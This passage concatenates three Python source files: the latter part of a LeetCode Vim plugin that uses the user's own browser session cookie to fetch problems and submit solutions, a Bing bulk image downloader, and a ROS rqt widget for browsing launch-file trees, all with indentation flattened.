return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
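    # e.g. ['a', '', '', 'b'] becomes ['a', '', 'b', '']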
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
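    # drop everything up to and including the line that contains the '[End of Description]'
    # marker, leaving only the user's solution code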
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def get_progress():
headers = _make_headers()
res = session.get(LC_PROGRESS_ALL, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the progress')
return None
data = res.json()
if 'solvedTotal' not in data:
return None
return data
def load_session_cookie(browser):
if browser_cookie3 is None:
_echoerr('browser_cookie3 not installed: pip3 install browser_cookie3 --user')
return False
if keyring is None:
_echoerr('keyring not installed: pip3 install keyring --user')
return False
session_cookie_raw = keyring.get_password('leetcode.vim', 'SESSION_COOKIE')
if session_cookie_raw is None:
cookies = getattr(browser_cookie3, browser)(domain_name=LC_BASE.split('/')[-1])
for cookie in cookies:
if cookie.name == 'LEETCODE_SESSION':
session_cookie = cookie
session_cookie_raw = pickle.dumps(cookie, protocol=0).decode('utf-8')
break
else:
_echoerr('Leetcode session cookie not found. Please login in browser.')
return False
keyring.set_password('leetcode.vim', 'SESSION_COOKIE', session_cookie_raw)
else:
session_cookie = pickle.loads(session_cookie_raw.encode('utf-8'))
global session
session = requests.Session()
session.cookies.set_cookie(session_cookie)
progress = get_progress()
if progress is None:
_echoerr('cannot get progress. Please relogin in your browser.')
keyring.delete_password('leetcode.vim', 'SESSION_COOKIE')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
log.info('_get_category_problems request: url="%s" headers="%s"',
url, headers)
res = session.get(url, headers=headers)
log.info('_get_category_problems response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def _split(s):
if isinstance(s, list):
lines = []
for element in s:
lines.extend(_split(element))
return lines
# Replace all \r\n to \n and all \r (alone) to \n
s = s.replace('\r\n', '\n').replace('\r', '\n').replace('\0', '\n')
    # str.split has a disadvantage that ''.split('\n') results in [''], but what we want
    # is []. This small function returns [] if `s` is a blank string, that is, one containing no
    # characters other than whitespace.
if s.strip() == '':
return []
return s.split('\n')
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = _split(q['sampleTestCase'])
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': _split([v for k, v in r.items() if 'error' in k and v])
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = _split(r.get('code_output', []))
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
result['expected_answer'] = r.get('expected_code_answer', [])
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
result = _check_result(res.json()['interpret_id'])
result['testcase'] = test_input.split('\n')
result['title'] = title
return result
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
    # we need to parse the data from the JavaScript snippet embedded in the submission page
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
    # the punctuation and newlines in the code are escaped like '\\u0010' ('\\' => real backslash)
    # to unescape the string, we do the trick '\\u0010'.encode().decode('unicode_escape') ==> '\n'
submission['code'] = _break_code_lines(_unescape(_group1(
re.search("submissionCode: '([^']*)'", s), '')))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
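    # walk the distribution from the slowest bucket downwards, accumulating the share of
    # submissions that are at least as slow as this one (roughly the "beats X%" percentile)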
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
    log.info('get_topics_and_companies request: url="%s"', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
|
bbid.py
|
# Modification: 7/17/2019
# by: Seth Juarez (Microsoft)
# changes: This code has been modified from the original (https://github.com/ostrolucky/Bulk-Bing-Image-downloader).
# Moved bulk '__main__' code to a separate function in order to make it easily callable from other
# python programs. No functional changes were made otherwise.
#
# see: fetch_images function
#!/usr/bin/env python3
import os, urllib.request, re, threading, posixpath, urllib.parse, argparse, socket, time, hashlib, pickle, signal, imghdr
#config
output_dir = './bing' #default output dir
adult_filter = True #Do not disable adult filter by default
socket.setdefaulttimeout(2)
in_progress = []
tried_urls = []
image_md5s = {}
urlopenheader={ 'User-Agent' : 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'}
def download(pool_sema: threading.Semaphore, url: str, output_dir: str):
if url in tried_urls:
return
pool_sema.acquire()
path = urllib.parse.urlsplit(url).path
filename = posixpath.basename(path).split('?')[0] #Strip GET parameters from filename
name, ext = os.path.splitext(filename)
name = name[:36]
filename = name + ext
i = 0
while os.path.exists(os.path.join(output_dir, filename)) or filename in in_progress:
i += 1
filename = "%s-%d%s" % (name, i, ext)
in_progress.append(filename)
try:
request=urllib.request.Request(url,None,urlopenheader)
image=urllib.request.urlopen(request).read()
if not imghdr.what(None, image):
print('FAIL: Invalid image, not saving ' + filename)
return
md5_key = hashlib.md5(image).hexdigest()
if md5_key in image_md5s:
print('FAIL: Image is a duplicate of ' + image_md5s[md5_key] + ', not saving ' + filename)
return
image_md5s[md5_key] = filename
imagefile=open(os.path.join(output_dir, filename),'wb')
imagefile.write(image)
imagefile.close()
print("OK: " + filename)
tried_urls.append(url)
    except Exception as e:
        print("FAIL: %s (%s)" % (filename, e))
finally:
in_progress.remove(filename)
pool_sema.release()
def fetch_images_from_keyword(pool_sema: threading.Semaphore, keyword: str, output_dir: str, filters: str, limit: int, adlt: str):
current = 0
last = ''
while True:
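        # e.g. https://www.bing.com/images/async?q=red+panda&first=0&count=35&adlt=off&qft= (illustrative query)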
request_url='https://www.bing.com/images/async?q=' + urllib.parse.quote_plus(keyword) + '&first=' + str(current) + '&count=35&adlt=' + adlt + '&qft=' + ('' if filters is None else filters)
request=urllib.request.Request(request_url,None,headers=urlopenheader)
response=urllib.request.urlopen(request)
html = response.read().decode('utf8')
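        # each 'murl' field in the async search results holds the direct URL of a full-size image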
links = re.findall('murl":"(.*?)"',html)
try:
if links[-1] == last:
return
for index, link in enumerate(links):
if limit is not None and current + index >= limit:
return
t = threading.Thread(target=download, name='bbid', args=(pool_sema, link, output_dir))
t.start()
current += 1
last = links[-1]
except IndexError:
print('No search results for "{0}"'.format(keyword))
return
time.sleep(0.1)
def backup_history(*args):
download_history = open(os.path.join(output_dir, 'download_history.pickle'), 'wb')
pickle.dump(tried_urls,download_history)
    copied_image_md5s = dict(image_md5s)  # dump a copy, because the dict must not change size while pickle is serializing it
pickle.dump(copied_image_md5s, download_history)
download_history.close()
print('history_dumped')
if args:
exit(0)
def fetch_images(adult_filter_off=False, adult_filter_on=False, filters=None, limit=None, output=None, search_file=None, search_string=None, threads=20):
    # download() and backup_history() rely on these module-level variables
    global output_dir, tried_urls, image_md5s
    if (not search_string) and (not search_file):
        raise Exception('Provide either a search string or a path to a file containing search strings')
if output:
output_dir = output
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_dir_origin = output_dir
signal.signal(signal.SIGINT, backup_history)
try:
download_history = open(os.path.join(output_dir, 'download_history.pickle'), 'rb')
tried_urls=pickle.load(download_history)
image_md5s=pickle.load(download_history)
download_history.close()
except (OSError, IOError):
tried_urls=[]
if adult_filter:
adlt = ''
else:
adlt = 'off'
if adult_filter_off:
adlt = 'off'
elif adult_filter_on:
adlt = ''
pool_sema = threading.BoundedSemaphore(threads)
if search_string:
fetch_images_from_keyword(pool_sema, search_string,output_dir, filters, limit, adlt)
elif search_file:
try:
inputFile=open(search_file)
except (OSError, IOError):
print("Couldn't open file {}".format(search_file))
exit(1)
for keyword in inputFile.readlines():
output_sub_dir = os.path.join(output_dir_origin, keyword.strip().replace(' ', '_'))
if not os.path.exists(output_sub_dir):
os.makedirs(output_sub_dir)
            fetch_images_from_keyword(pool_sema, keyword.strip(), output_sub_dir, filters, limit, adlt)
backup_history()
inputFile.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Bing image bulk downloader')
parser.add_argument('-s', '--search-string', help = 'Keyword to search', required = False)
parser.add_argument('-f', '--search-file', help = 'Path to a file containing search strings line by line', required = False)
parser.add_argument('-o', '--output', help = 'Output directory', required = False)
parser.add_argument('--adult-filter-on', help ='Enable adult filter', action = 'store_true', required = False)
parser.add_argument('--adult-filter-off', help = 'Disable adult filter', action = 'store_true', required = False)
parser.add_argument('--filters', help = 'Any query based filters you want to append when searching for images, e.g. +filterui:license-L1', required = False)
parser.add_argument('--limit', help = 'Make sure not to search for more than specified amount of images.', required = False, type = int)
parser.add_argument('--threads', help = 'Number of threads', type = int, default = 20)
args = parser.parse_args()
fetch_images(**vars(args))
|
launchtree_widget.py
|
#!/usr/bin/env python
import os
import re
import yaml
import threading
import itertools
import rospy
import rospkg
import roslaunch
from .launchtree_loader import LaunchtreeLoader
from .launchtree_config import LaunchtreeConfig, LaunchtreeArg, LaunchtreeRemap, LaunchtreeParam, LaunchtreeRosparam
from PyQt5.uic import loadUi
from PyQt5.QtCore import Qt, pyqtSignal as Signal
from PyQt5.QtWidgets import QFileDialog, QWidget, QTreeWidgetItem
from PyQt5.QtGui import QIcon, QColor
class LaunchtreeEntryItem(QTreeWidgetItem):
_type_order = [dict, roslaunch.core.Node, LaunchtreeRosparam, roslaunch.core.Param, LaunchtreeRemap, LaunchtreeArg, object]
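	# tree sort order: includes (dict) first, then nodes, rosparam loads, params, remaps, args,
	# and finally anything else; entries of the same type are sorted alphabetically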
#inconsistent = False
def __init__(self, *args, **kw ):
super(LaunchtreeEntryItem, self).__init__(*args, **kw)
self.inconsistent = False
def __ge__(self, other):
		own_type_idx = [isinstance(self.instance, t) for t in self._type_order].index(True)
		other_type_idx = [isinstance(other.instance, t) for t in self._type_order].index(True)
if own_type_idx != other_type_idx:
return own_type_idx >= other_type_idx
return self.text(0) >= other.text(0)
def __lt__(self, other):
return not self.__ge__(other)
class LaunchtreeWidget(QWidget):
update_launch_view = Signal(object)
display_load_error = Signal(str, str)
def __init__(self, context):
super(LaunchtreeWidget, self).__init__()
self._rp = rospkg.RosPack()
self._rp_package_list = self._rp.list()
res_folder = os.path.join(self._rp.get_path('rqt_launchtree'), 'resource')
ui_file = os.path.join(res_folder, 'launchtree_widget.ui')
loadUi(ui_file, self)
self._block_load = True
self.editor = 'gedit' # configure via settings
self.setObjectName('LaunchtreeWidget')
self.reload_button.setIcon(QIcon.fromTheme('view-refresh'))
self._properties_empty_ui = os.path.join(res_folder, 'properties_empty.ui')
self._properties_param_ui = os.path.join(res_folder, 'properties_param.ui')
self._icon_include = QIcon(os.path.join(res_folder, 'img/include.png'))
self._icon_node = QIcon(os.path.join(res_folder, 'img/node.png'))
self._icon_param = QIcon(os.path.join(res_folder, 'img/param.png'))
self._icon_arg = QIcon(os.path.join(res_folder, 'img/arg.png'))
self._icon_remap = QIcon(os.path.join(res_folder, 'img/remap.png'))
self._icon_rosparam = QIcon(os.path.join(res_folder, 'img/rosparam_load.png'))
self._icon_default = QIcon(os.path.join(res_folder, 'img/default.png'))
self._icon_warn = QIcon(os.path.join(res_folder, 'img/warn.png'))
self._launch_separator = ' -- '
self._highlight_color = QColor(255, 255, 150)
self._neutral_color = QColor(255, 255, 255, 0)
# connect signals
self.update_launch_view.connect(self._update_launch_view)
self.display_load_error.connect(self._display_load_error)
self.package_select.currentIndexChanged.connect(self.update_launchfiles)
self.launchfile_select.currentIndexChanged.connect(lambda idx: self.load_launchfile())
self.reload_button.clicked.connect(self.load_launchfile)
self.open_button.clicked.connect(self._root_open_clicked)
self.launch_view.currentItemChanged.connect(self.launch_entry_changed)
self.filter_nodes.toggled.connect(lambda t: self._filter_launch_view())
self.filter_params.toggled.connect(lambda t: self._filter_launch_view())
self.filter_args.toggled.connect(lambda t: self._filter_launch_view())
self.filter_remaps.toggled.connect(lambda t: self._filter_launch_view())
self.filter_empty.toggled.connect(lambda t: self._filter_launch_view())
self.search_input.textChanged.connect(lambda t: self._filter_launch_view(collapse=t==''))
self.launch_open_button.clicked.connect(self._launch_open_clicked)
self.reset()
def reset(self):
self._launch_config = LaunchtreeConfig()
self._package_list = list()
self._load_thread = None
self.properties_content.setCurrentIndex(0)
self.main_view.setCurrentIndex(0)
self.update_package_list()
def block_load(self, do_block):
self._block_load = do_block
def load_launchfile(self):
if self._block_load: return
self.launch_view.clear()
self.properties_content.setCurrentIndex(0)
self.main_view.setCurrentIndex(0)
filename = os.path.join(
self._rp.get_path(self.package_select.currentText()),
self.launchfile_select.currentText()
)
launchargs = roslaunch.substitution_args.resolve_args(self.args_input.text()).split(' ')
if os.path.isfile(filename):
self.progress_bar.setRange(0,0)
self._load_thread = threading.Thread(target=self._load_launch_items, args=[filename, launchargs])
self._load_thread.daemon = True
self._load_thread.start()
def _load_launch_items(self, filename, launchargs):
self._launch_config = LaunchtreeConfig()
items = list()
try:
loader = LaunchtreeLoader()
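			# pad argv to mimic a typical sys.argv layout (program name, launch file, ...) before
			# appending the user-supplied 'key:=value' assignments that roslaunch resolves as args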
loader.load(filename, self._launch_config, verbose=False, argv=['','',''] + launchargs)
items = self.display_config_tree(self._launch_config.tree)
except Exception as e:
error_msg = re.sub(r'(\[?(?:/\w+)+\.launch\]?)',
lambda m: '[%s]'%self._filename_to_label(m.group(0)),
str(e)
)
help_msg = ''
if 'arg to be set' in str(e):
help_msg = 'You can pass args to the root launch file by specifying them in the "args" input field, for example "arg_key:=arg_value".'
self.display_load_error.emit(error_msg, help_msg)
self.update_launch_view.emit(items)
def display_config_tree(self, config_tree):
items = list()
for key, instance in config_tree.items():
if key == '_root': continue
i = LaunchtreeEntryItem()
i.instance = instance
if isinstance(i.instance, roslaunch.core.Param):
i.inconsistent = i.instance.inconsistent
if isinstance(instance, dict):
childItems = self.display_config_tree(instance)
i.inconsistent = any(c.inconsistent for c in childItems)
i.addChildren(childItems)
i.instance = instance.get('_root', instance)
if isinstance(i.instance, dict):
i.setText(0, self._filename_to_label(key.split(':')[0]))
i.setIcon(0, self._icon_include if not i.inconsistent else self._icon_warn)
else:
i.setText(0, self._filename_to_label(key.split(':')[0]) if isinstance(i.instance, LaunchtreeRosparam) else
key.split(':')[0])
i.setIcon(0,
self._icon_warn if i.inconsistent else
self._icon_node if isinstance(i.instance, roslaunch.core.Node) else
self._icon_param if isinstance(i.instance, roslaunch.core.Param) else
self._icon_arg if isinstance(i.instance, LaunchtreeArg) else
self._icon_remap if isinstance(i.instance, LaunchtreeRemap) else
self._icon_rosparam if isinstance(i.instance, LaunchtreeRosparam) else
self._icon_default)
items.append(i)
return items
def _display_load_error(self, error_msg, help_msg):
self.error_label.setText(error_msg)
self.help_label.setText(help_msg)
self.main_view.setCurrentIndex(1)
def _update_launch_view(self, items):
self.launch_view.clear()
self.launch_view.addTopLevelItems(items)
self.launch_view.sortItems(0, Qt.AscendingOrder)
self._filter_launch_view()
self.progress_bar.setRange(0,1)
self.progress_bar.setValue(1)
self._load_thread = None
def update_package_list(self):
self._package_list = sorted(
filter(lambda p: len(self._get_launch_files(self._rp.get_path(p)))>0,
self._rp_package_list
)
)
self.package_select.clear()
self.package_select.addItems(self._package_list)
self.package_select.setCurrentIndex(0)
def update_launchfiles(self, idx):
package = self.package_select.itemText(idx)
folder = self._rp.get_path(package)
launchfiles = self._get_launch_files(folder)
self.launchfile_select.clear()
self.launchfile_select.addItems(launchfiles)
def _get_launch_files(self, path):
return sorted(
itertools.imap(lambda p: p.replace(path + '/', ''),
itertools.ifilter(self._is_launch_file,
itertools.chain.from_iterable(
itertools.imap(lambda f:
map(lambda n: os.path.join(f[0], n), f[2]),
os.walk(path)
)
)
)
)
)
def _is_launch_file(self, path):
if not os.path.isfile(path): return False
(root, ext) = os.path.splitext(path)
if ext != '.launch': return False
return True
def launch_entry_changed(self, current, previous):
#clear properties
if current is None:
return
data = current.instance
if isinstance(data, dict) and data.has_key('_root'):
data = data['_root']
if isinstance(data, roslaunch.core.Param):
self.properties_content.setCurrentIndex(1)
self.param_name.setText(data.key.split('/')[-1] + ':')
if isinstance(data.value, list):
self.param_value_list.clear()
self.param_value_list.addItems(list(str(v) for v in data.value))
self.param_value_panel.setCurrentIndex(2)
elif len(str(data.value)) < 100:
self.param_value.setText(str(data.value))
self.param_value_panel.setCurrentIndex(0)
else:
self.param_value_long.setPlainText(str(data.value))
self.param_value_panel.setCurrentIndex(1)
elif isinstance(data, roslaunch.core.Node):
self.properties_content.setCurrentIndex(2)
self.node_package.setText(data.package)
self.node_type.setText(data.type)
self.node_namespace.setText(str(data.namespace))
self.node_args.setText(str(data.args))
self.node_args.setEnabled(data.args != '')
self.node_prefix.setText(str(data.launch_prefix) if data.launch_prefix is not None else '')
self.node_prefix.setEnabled(data.launch_prefix is not None)
self.node_machine.setText(str(data.machine_name) if data.machine_name is not None else '')
self.node_machine.setEnabled(data.machine_name is not None)
elif isinstance(data, LaunchtreeArg):
self.properties_content.setCurrentIndex(4)
self.arg_name.setText(data.name)
self.arg_value.setText(str(data.value) if data.value is not None else '')
self.arg_default.setText(str(data.default) if data.default is not None else '')
self.arg_doc.setText(str(data.doc) if data.doc is not None else '')
self.arg_value.setEnabled(data.value is not None)
self.arg_default.setEnabled(not self.arg_value.isEnabled())
elif isinstance(data, LaunchtreeRemap):
self.properties_content.setCurrentIndex(5)
self.remap_from.setText(data.from_topic)
self.remap_to.setText(data.to_topic)
elif isinstance(data, roslaunch.core.Machine):
self.properties_content.setCurrentIndex(6)
self.machine_address.setText(str(data.address))
self.machine_port.setText(str(data.ssh_port))
self.machine_user.setText(str(data.user) if data.user is not None else '')
self.machine_user.setEnabled(data.user is not None)
self.machine_loader.setText(str(data.env_loader) if data.env_loader is not None else '')
self.machine_loader.setEnabled(data.env_loader is not None)
